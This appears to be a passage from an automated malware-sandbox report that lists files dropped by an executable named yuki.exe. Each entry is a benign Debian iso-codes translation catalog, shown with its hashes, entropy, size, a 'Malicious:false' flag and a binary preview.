                                                                                                    SSDEEP:12:i3s1xjt02UkLKcG/Ki4FLuvWXmBQWihjEl:Ms5t0UPKKzFiOXm6M
                                                                                                    MD5:8E65B8FB5AE1E6C9DC14E529A7BE1173
                                                                                                    SHA1:EC09478DD195F59047806E570D4D9BBD4AE1B3EC
                                                                                                    SHA-256:8709FA97DE961157F980C303D03FAC7811CDCCD36B3D13D751C9CDA10361E40D
                                                                                                    SHA-512:4BCDD44D954329167655244D674B6414C80D7AF3DFC4B4BB6C3A50A89380DA63369951706BE0D4A43E56286E328D3B9212A14990ADB7916318E6470A13D07F18
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...M...f...%............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Blin.Language: byn.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit......... ......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 121 messages, Project-Id-Version: iso_639-3 '\341\212\240\341\211\245\341\210\220\341\213\232\341\212\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5693
                                                                                                    Entropy (8bit):4.867788659332964
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kGQGu8IdRxHKiisAEmrG+Kbpy95Mo9Yk2pL5lsx2OrtZFdjVoEP0GCuk:k0u8yisWG+KU9qDlIkOrtZrjnMuk
                                                                                                    MD5:3564D55B70D576A9BACA6927E22376E2
                                                                                                    SHA1:6E16CEEC08EF53DD405A5B0CC3E2DF05CD169257
                                                                                                    SHA-256:53AB888121379F2AAF98711E821E707B9A98F763D0DBF4D0C3CBD8DC51DA3E96
                                                                                                    SHA-512:CA018BCAB4C2CCCE1E78C024C3C39E03AB3906DE06CDF3513F4FD3DC3BD7786D645CC4D8610B7ECAF18BA8231920E90B5D1289B7FAB9438AD77F9A01B699F245
                                                                                                    Malicious:false
                                                                                                    Preview:........y.......................8.......9.......C.......H.......R.......[.......c.......j.......s.......|...............................................................................................................................................................".......+.......3.......:.......B.......I.......N.......W.......^.......f.......o.......u.......|...............................................................................................................................................................$.......,.......4.......?.......J.......S.......].......e.......k.......s.......}.......................................................................................................................................................................&.......0.......6.......>.......F.......L.......R.......X......._.......d.......l.......r.......{...................................................................................................................................I...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 49 messages, Project-Id-Version: iso_15924 '\303\240rab'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2945
                                                                                                    Entropy (8bit):4.931979927219547
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:JVmYz+iznQXZVbuyS2YvJwvd4Mma3NKV8HRlUA51IQDg+MGcBAYzuLjaVFb3Gbti:fyYniZR6ivd4Mma3SSRl75yQk+MGcCYR
                                                                                                    MD5:ED78D3F85607BC72C7D2AD804F969F09
                                                                                                    SHA1:8F01D67BAE26F571D0974FB61623E0DE1B1F8B93
                                                                                                    SHA-256:34B5FA1F824F71892F712E68C1699A34D4637A4BB2565C882C5C9E4386D0B4ED
                                                                                                    SHA-512:166E1785B8A5948E6AE0126DF917447AB49DA50ACA680903DE269B362E1BEE49E67CFA365D3A9E664F056420D939EEE110B6D5D8C2766B9BFC004EDBEC701FE9
                                                                                                    Malicious:false
                                                                                                    Preview:........1...........C...,.......8.......9.......@.......I.......Q.......Z.......b.......n.......v...............................................................................2.......9.......?.......X.......r.......y.............................................................................../..."...9.......\.......h.......n.......y...........................................................................................................................................................!......."...#.......F.......f.......l.......u...........................................................................,...........;.......A.......a.......h...........................................!........................................................... .......=.......D.......K.......O.......W.......i.......s...............................................................................................#...'............... .../...........0...,...1...........-.......".......................%.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23927
                                                                                                    Entropy (8bit):5.0537594274300925
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosm8vUPr8o46nbjz5wsWP48WAINiZGk7fAuLpfdAARXgKc3T:0or8Mj8o48fmsWP48WAIBuLvAsXgKW
                                                                                                    MD5:10F4A74B294CCB911A85C69E620138AF
                                                                                                    SHA1:AC4D659DA3B2169E95B55C1C9B6D68A77C25A8C4
                                                                                                    SHA-256:C6200415D8466119413DF00A1E375B318724C096B447D44BA32A8C97B5918937
                                                                                                    SHA-512:AE06BA47654DEB47670CB7C80DAD7AFAAC7BD161C71D2F774C7504BD2C7C101AE6468627704436F7024AD5483AC3D5A946943987011A09B04D3F6CE1D7DF5C64
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 96 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4601
                                                                                                    Entropy (8bit):4.818690266789457
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:mTUzvFy8LB3fzcpIcDGbMA1hJqRlaI/aRYtamWg1uuJR91:mkQ81PjajAFNIDTWgLN1
                                                                                                    MD5:F94AD1069F6C9B4EE1DB164D44F76A4C
                                                                                                    SHA1:5EB4E9C33AE17E8384748461BDE4E283B1CEB348
                                                                                                    SHA-256:C22B990F8B842ECB02E7CC339CC9D446C80133D56239CC6C36AF3DB0F9206EE4
                                                                                                    SHA-512:A3343B2EE64F95DAF1C23293911996CA90518C7EDE685E215CE4F7B0AA8A8A21C6D7B9DE32B390C67B2B4469C70F0ED80720C493AFD5438603F4CDB524641980
                                                                                                    Malicious:false
                                                                                                    Preview:........`.......................(.......).......1.......8.......A.......I.......R.......a.......l.......}....................................................................................................................... .......,.......3.......<.......E.......L.......U.......j.......s.......z.......................................................................................................................................................%...............8.......D.......M.......V.......].......k.......y.............................................................................................................................../.......M.......Y.......`.......m...........................................$...................................................................".......(......./....................................... .......(.......8.......B.......S.......Z.......c.......i.......s.......{.......................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Territori Brit\303\240nic Ant\303\240rtic'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2865
                                                                                                    Entropy (8bit):5.20922257347663
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3QdBp3ua+vGqIfdvqN5CoUqDofXn3bb9NascIX:rLvQ5ea+yaCo5Dofbb9NrX
                                                                                                    MD5:62F4709293703EC953ADE74E7DFD2C7D
                                                                                                    SHA1:25794DD73CF7CB0B97FA77F64A59C39D90C119A3
                                                                                                    SHA-256:AC4ECA2AEFDC1D1E7D8CFFC35C2C1901EEC6A005B36EAB0FBBB849DEBC09FC84
                                                                                                    SHA-512:634824E2D3A23844829AAC65D9788F5B4666862930EDBD225535935C65B7920685825E00AD019C057DE90279722002C212855F4F9AEC801BA5C47D797C41B1D7
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................+.......0...........)...3...B.......v.......~...................*.......)....... ...........1.......H.......V.......c.......y...........(.......................................1.......4...8.......m...#...............7.......-....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 172 messages, Project-Id-Version: iso_4217 'Afgani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9059
                                                                                                    Entropy (8bit):4.953593939817488
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:b3mwTZ/p5MWN9vq6K0v2LC/5TNqzE96iNNufjEk:b3JF/p5MWzqD0vUU5TNqzE9xN6jEk
                                                                                                    MD5:4CCB5B1E7599B534AE9FBD68C1386879
                                                                                                    SHA1:C330D67F7B6115F6640A961EACC5CFD32F60A4FD
                                                                                                    SHA-256:7FC5B29D47580C476E7E3A0466C1249E273498DAD208C79D65F2D5F7993BEB5C
                                                                                                    SHA-512:67FC67A36ECB0BEDF65A90F4105CBAB941EAFC2E197A80C8779A09674CF60B2A310B07F730B9EE903FA6654DFDE366ED1701E35EABFB7AC966ACAFEA4D541F42
                                                                                                    Malicious:false
                                                                                                    Preview:................|...............p.......q.......y...............................................................................................".......0.......A.......K...1...]...3...................................................................%.......7.......G.......]...0...j.......................................................................................$.......*.......9.......?.......N.......S.......i.......x...............................................................................................................$.......,.......:.......G.......T.......`.......p.......................................................................................................................................................,.......>.......N.......[.......h.......x...............................................................................................+.......;.......C.......R.......\.......c.......m.......~.......................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 583 messages, Project-Id-Version: iso_639-3 '' Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25765
                                                                                                    Entropy (8bit):4.943639742131427
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:TYbOlsoYXLR0UOm2aZJDYfNayNprlqDjynXNrsY89tvYnmVQ3S2b8j4heP1AsfAh:8LJJ0FayNQjW5yY/JlQ6sfA
                                                                                                    MD5:E9F07C5551652722084BB1774DCABABF
                                                                                                    SHA1:8F915A01E13551FE29B5639C0B3CFA7FFD0B34D0
                                                                                                    SHA-256:62BF4D79C4D291A5CDC925208237AA8A43912DDD1491FCD689F9AD594008CE54
                                                                                                    SHA-512:0A97CF4880B43AA29DE626B6BCB1A67E106BEA1BD3AE3D53AF16B3D5200506AA167C54617F7D1C80BBF74A2459E514133634B6B2B4FF67EF62389DFDFF44BDD6
                                                                                                    Malicious:false
                                                                                                    Preview:........G.......T........$.......0.......0.......0.......0.......0.......0.......1.......1.......1.......1......%1......,1......51......?1......O1......_1......d1......i1......o1......s1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......1.......2.......2.......2.......2......#2......'2......12......?2......E2......L2......S2......W2......\2......q2......x2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......2.......3.......3.......3.......3......"3......(3....../3......53......B3......O3......U3......[3......i3......x3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......3.......4.......4.......4.......4......(4......24......;4......Q4......f4......l4......r4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......4.......5......$5......-5......95......A5......H5......P5......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 201 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263I\320\260\320\275\320\270\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10819
                                                                                                    Entropy (8bit):5.079637628519295
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:7ufrvcUc8uplfKTD0agJ8kutheKjR1xGfgKE/fpn2krWyJw3tMW4bLzay+fTPDYi:qT1c/plC/DgJ8kuXeK38gXR2kCykMW86
                                                                                                    MD5:3DDDA5720AAB13AA130370C06FBA9240
                                                                                                    SHA1:DDF466545A5F8CFF4CE9EE9F43698BEF82627AFA
                                                                                                    SHA-256:472F0B1F865A9A68871926851314361A8EFF6ECCF93D1DE8C735CCA27B00BAB6
                                                                                                    SHA-512:BE7A009528DAEE3328C7BDDD39B5CDF80F6EE6FFFEAB48519AEBB51B78F2A6AD5A8F0AC4937A0BF09DE30C62C85C00B6EA044D53DD1C73EB1FFFD418C2918E7D
                                                                                                    Malicious:false
                                                                                                    Preview:................d.............................................................................../.......9.......A.......G.......Q.......Y.......d.......l.......w.......................................................................................................................(.......5.......=.......F.......O.......V.......e.......~.......................................................................................................................................!.......).......2.......@......._.......d.......l.......s.......................................................................................................................................................................%.......*.......2.......9.......?.......G.......M.......T......._.......e.......n.......u...............................................................................................................................................................&...............5.......>.......I.......T.......\.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 23 messages, Project-Id-Version: iso_3166-1 'Argentina'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1416
                                                                                                    Entropy (8bit):4.974896627081915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:aeRnaAn/sEc7idl4/VAxPX3c4J9iUpz/5Nbfh5jt0UktGk/b2WXmGRfYxPX3Q9iT:aEnaBPKxPFp1dh5yUlkKjNxP3aHgW6l
                                                                                                    MD5:7495277C42B91C099277C537423F0C30
                                                                                                    SHA1:02DC94A8DC34884B065CE3BF870E90EA36471A9B
                                                                                                    SHA-256:2CA451F44793FD0BCAFD845AE0F6198C08D43C224E5F12CEBE85FF4D5CB3F7A1
                                                                                                    SHA-512:DB079B53D055804B16E3EE57D1EB7821F64A12BB573181BA5C2488ABA27EE606B65A3333B18863473EA816F0E1329F969F6E8B65ADB4534C0B8AC0A23D3E7FB1
                                                                                                    Malicious:false
                                                                                                    Preview:................................................................#.......*.......3.......9.......X.......`.......g.......o.......t.......~...............................................................................................................................................................................!.......+.......2.......9.......B.......R.......X.......b.......i.......q........................................................................................................................................Argentina.Armenia.Austria.Brazil.Bulgaria.Chile.Federated States of Micronesia.Finland.France.Germany.Guam.Indonesia.Italy.Japan.Lithuania.Northern Mariana Islands.Peru.Philippines.Poland.Spain.United States of America.Vietnam.Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-28 02:49+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Chamorro <https://hosted.webl
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 100 messages, Project-Id-Version: iso_3166-1 '\341\216\240\341\217\253\341\216\250\341\217\202\341\217\215\341\217\226\341\217\202'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5143
                                                                                                    Entropy (8bit):5.020513038877694
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:xXqul8FzZGBYKATojbb6uAFyJIJ5CJoy/13TCywjr7woFDDQ:xBGTEb6SBBZ+x7wMQ
                                                                                                    MD5:31EBB06C99924925059928FF84F3890D
                                                                                                    SHA1:E94A8BB64DA72A2B4D581E332EA3BD03F83AF035
                                                                                                    SHA-256:74DC62FFFD7B41FC8921F5CBA536653A92036CD84A23EC503591D69BF8913FBB
                                                                                                    SHA-512:D8C0B1AE4A8B0214E565B9F0ECE2408810D780985FB0494772D70D21589228E9B2F3E942374DAF1A0BC993D6A56B82E2C694A32161F6B47DFA4477F47834CACB
                                                                                                    Malicious:false
                                                                                                    Preview:........d.......<.......\............................................................................................................................................... .......).......1.......9.......@.......F.......N.......U.......].......t.......}...............................................................................................................................................$.......+.......3.......;.......B.......L.......U.......].......e.......k.......u.......}.......................................................................................................................................................#.......*.......3.......N.......Z.......a.......j.......r.......}.......................................................................................................................".......*.......9...............'.......7.......G.......^.......k.......x.......................................................................................$.......1.......A.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 197 messages, Project-Id-Version: iso_3166-1 '\330\246\333\225\331\201\330\272\330\247\331\206\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10429
                                                                                                    Entropy (8bit):5.134656210465522
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:WbEddefyMIzMG3V4u4uRTVV6/WgP18guoImMMzYt7n3kDv49Azh:fddefym+d4uRRY/WgP6gurKHcI
                                                                                                    MD5:8EAB73F636BBAA8438798B7952D41BDA
                                                                                                    SHA1:73156A66173AD405973411A05777F18F9A275CCA
                                                                                                    SHA-256:F821B4E5DB984E984A7942FABAB40A72AFD5F8220BAF09BFAC2584E4C0E3C272
                                                                                                    SHA-512:3EBDF9B1B288894832F1AE64F25B10A69E3456859A4E1844D982F1B95528B1F672DC2A89538AAAEC1AF21C801C2E61E9A826BC19499F1C91C7C158CEFB94EB87
                                                                                                    Malicious:false
                                                                                                    Preview:................D.......l...............................................................................................................................................(.......1.......9.......A.......H.......N.......V.......].......e.......|...............................................................................................................................*.......2.......7.......>.......M.......U.......^.......g.......z...............................................................................................................................".......,.......3.......;.......E.......L.......Z.......a...!...g...............................................................................................................................................%.......,.......7.......>.......F.......N.......V.......\.......j.......t...............................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 390 messages, Project-Id-Version: iso_3166-1 'Af\304\237anistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21581
                                                                                                    Entropy (8bit):5.09154225688461
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:yn9wKnsOq/ImCn6tAObjj5wsOP4YGCAjtuLawix0i658:yOKrII7n69XmsOP4YGCAj5xm58
                                                                                                    MD5:022A4109C7932409B727C83C2BDF6A5C
                                                                                                    SHA1:5DE03F3579372C4FCCEA7A84AEBD5CF2C2996949
                                                                                                    SHA-256:9A2A3892C0E03F7BE4019BF7E5BEEFCF0BCF48B5FC5CDDDBE276249A81E3AFBF
                                                                                                    SHA-512:AB95C6A6D45BC572090BD28D0336723DDD39B2D5246F6A977010BAA49587C34DAD586149A98C8BEA58F80FF231ECFCE5AE321B6AA45AD86D7FA80BB3775B07F5
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|........ ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!......$!......7!......?!......E!......O!......W!......b!......j!......r!......}!.......!.......!.......!.......!.......!.......!.. ....!.......!.......!.......!.......!......."......."....../"......F"......X"......a"......n"......v".......".......".......".......".......".......".......".......".......".......".......".......#..,.../#......\#......d#..%...j#.......#.......#.......#.......#.......#.......#.......#..%....#..,....$.."...-$..*...P$......{$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%......%%..'...3%..$...[%.......%.......%.......%.......%.......%.......%.......&.......&.......&......(&......8&......T&......Z&......l&......s&......{&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'.......'..!...''......I'......['......y'.......'..0....'......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 75 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3684
                                                                                                    Entropy (8bit):4.817438072960845
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:2ftOFXtvpPDVWiVbG31hBla6/Wj6aGcjk16+CylaE:2fto9tDYi83Oe4jklCXE
                                                                                                    MD5:5106647D66799660ADB5A8C355B3B0A6
                                                                                                    SHA1:F8B2F49ED9A6A765A683CE9EB46A876D954BFCD2
                                                                                                    SHA-256:3D587387DD639A8923D0E333808B0DE5934F1AE149AC9DC64B80145574F92D29
                                                                                                    SHA-512:46BF61E277A240EDF46DC51336B3CC3460F4EBEFA7B7ECDF53F5805534CE6FA9E5C152EC1412E8CA8F4584C60ABE87D28D970FA9469041124191C24F6B8D7A2B
                                                                                                    Malicious:false
                                                                                                    Preview:........K.......t...e...........`.......a.......i.......p.......x.......................................................................................................................................!.......)...............5.......>.......H.......S.......Y.......^.......g.......r.......{...............................................................................................................................!...............G.......S.......X.......a.......i.......p.......}...........................................................................$................... .......(.......1.......<.......J.......T.......\.......b.......i.......q.......x.......................................................................................................................................".......+.......3.......8.......?.......H.......R.......^.......d.......i.......r.......{.......................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\304\260ngiliz Antarktika B\303\266lgesi'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2773
                                                                                                    Entropy (8bit):5.335647750340985
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADIs/3dpZNRvGqIfdvqNuoU5o8Sfr+gmIMFpzdQ:qDh/zjRyBodN+g4pG
                                                                                                    MD5:322EB120F5ECE4FBFB4DA3D0653D827D
                                                                                                    SHA1:5D0AFC552848B188860D6E2084F9500E3DCBE520
                                                                                                    SHA-256:EBDB3CF6FCACB37E6EE537CFA0F15EDF90BC183978EB57A08FE4F75E998C5196
                                                                                                    SHA-512:7FBA42036A92D165D125332172723779C8DEBDE449661AF2A350B0674B410232216CE2FD594F3E91C478A498FE426CE58A56C9DE02EA0413D9449FA8D83C7904
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........................$...................4...0...Q...........................................*...........................:.......L.......\.......o...........$.......................................3.......,...).......V.......q..........."....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 6431 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):256161
                                                                                                    Entropy (8bit):5.161399127267561
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:eF5hsDF3D7IFbZGp2/bQON1r6/XpTF9EJXQHffphW2nC2TUFD:eKgV/zDr6S+HZ/UD
                                                                                                    MD5:94B603095932221B9B1F642C4C73E0D5
                                                                                                    SHA1:D5057CAA882BF27422ADC88143DCF00E419F44E4
                                                                                                    SHA-256:837E802D1856CC8E4F33EF50839D1C338E0E640C4A05DD254D4E47BDB14AB086
                                                                                                    SHA-512:98E455110BDA8B4BE650D449F3EB9B18B0F7DAB7D7D0EB97DEDE2BD8EEE45D365D31F4B470EDE0C6468E3E329F5EFBCBA1F8D56F7E289445E845BFC328E1F961
                                                                                                    Malicious:false
                                                                                                    Preview:.....................!.......... .......!.......*.......4.......?.......D.......K.......Q.......W.......c.......k.......p.......u.......{.......................................................................................................................................................................................+.......:.......C.......I.......X.......^.......e.......j...............................................................................................................................................................................#.......,.......6.......>.......F.......L.......Z.......`.......e.......k.......r.......v.......{...............................................................................................'.......-.......7.......A.......H.......M.......U.......Z.......a.......g.......o.......v.......~.......................................................................................................................................................#.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 161 messages, Project-Id-Version: iso_15924 'Afaka'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9003
                                                                                                    Entropy (8bit):5.15675535314221
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:NbjAMWh3Goh1oBY2kcO0oVrG1BOtu9AuTONfYqrmQ4jIpjeKqSa5hWo1l3zuvsQ9:VAPtgWHcZ4Vnb4j2j+Sa5hW8GIbxw
                                                                                                    MD5:E36ACC7079DF1C94366E01F5E3287F3E
                                                                                                    SHA1:9DBE5777A81E3E269DDF96858FCCAA7BA73E6B7B
                                                                                                    SHA-256:1875C54E1E1E459215E1792EC99B6E7AB969AC78524F53B58A1DD3311E0F587F
                                                                                                    SHA-512:47AE429EA85D8D9DEA71B04CFE5004C9B837BD5FEF6834B5E568A931553CC3A65939ADE43171D6E94086430F03673466D37B1B52F12F2025804EF65022D2F2C6
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,...............................................................................................................!.......*.......1.......9.......B.......H.......O.......V.......[.......d.......j...........................................................&...........0.......A...(...U.......~.......................................................................................................1.......J.......d.......~...................................................&...............4...F.......{...........................................................................#...........................".......&.......,.......D.......[.......j.......p.......y...............................................................................................".......7.......F...(...P.......y...................-.......................................#.......".......)...3.......].......h.......t................................................................................... ...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afgh\303\241nist\303\241n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24094
                                                                                                    Entropy (8bit):5.14910719344548
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosuFI8MKXnMp91bP46nbjz5wsWP48WAINiZGYgOBhhmrIVBk/dr7Zbk:0oxCxKXMp91748fmsWP48WAIy10aBk0
                                                                                                    MD5:F5AEC72FE1B277794B65DBC64FF13A6D
                                                                                                    SHA1:EFF987579017390A0A0BDBAA53B67CBC43530A82
                                                                                                    SHA-256:006B75C1AD38809AB490B2B0E72876E2DCA14DBF61CE263EB0932F1D8BF3E602
                                                                                                    SHA-512:BC7043B6BAD813366F42CCF4F09CC2EC7ACB81E3A8176722904E487BA8FE55A5940C2259C4D050C135142D8B09BDB0FB9651787B280A53ECB362BEA1A2495DDC
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 200 messages, Project-Id-Version: iso_3166-2 'Alabama'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9150
                                                                                                    Entropy (8bit):4.965049889517165
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:+PHCiesLHtSQPQlxmNgSsyL97cFvKsVTJcu6GvtT9QhW2vKstrLH:inesbtfPQvmNjtJ7YKEkQRQ86Kyv
                                                                                                    MD5:46DCA636D02640D52A7A74DF0FE0BBA9
                                                                                                    SHA1:C772A16D04F76153DC160CB4DE787E5E1F5B5F50
                                                                                                    SHA-256:356314CE93C5B3F8A729A6BC2A265643EF8774C7D4AF6AA0B5891B35809E6A08
                                                                                                    SHA-512:2ACCF390B268C3BD6123AAFDF34B478CF1C3B691075A27CB555C5CC60BF03243B22B1CC6B0FF1DF184859F3F5BDE5FB5571FF0E238911670B53E2FA4916B65F8
                                                                                                    Malicious:false
                                                                                                    Preview:................\...............................................................................................,.......3.......<.......C.......J.......R.......[.......n.......w....................................................................................................................... .......)......./.......8.......>.......S.......\.......g.......n.......w....................................................................................................................................... .......(.......;.......L.......`.......h.......o...............................................................................................................................,.......6.......<.......B.......G.......P.......[.......i.......r.......|.......................................................................................................................1.......7.......?.......N.......[.......t.......................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Britsk\303\251 teritorium v Antarktid\304\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2879
                                                                                                    Entropy (8bit):5.35250191689412
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3FslV5URaQ+vGqIfdvqN5CoUGAl3yw/b/Ne657WTptiyhq5V5dnYl:rLvFqqRaQ+yaCo3AlxD/46tWTp8vHI
                                                                                                    MD5:EFFAD64583D1FD29D4C145B97928D65F
                                                                                                    SHA1:069F4D3A5A87009D4B9CB74313BC7C16E66106FB
                                                                                                    SHA-256:5E5A46A1C56525C88913A1EB387D72AE2DE5BDB5DF5E3A950CF03A2E54C133C0
                                                                                                    SHA-512:1CD9114D90FF21FCA804AEBAA83CAFDB6946FB35CF617E1C6498EB8F2614A0FCB234BAFC167619A55EE4040A5DEDE4BB0AFB0663059D133CAEACEFD2C12D36F1
                                                                                                    Malicious:false
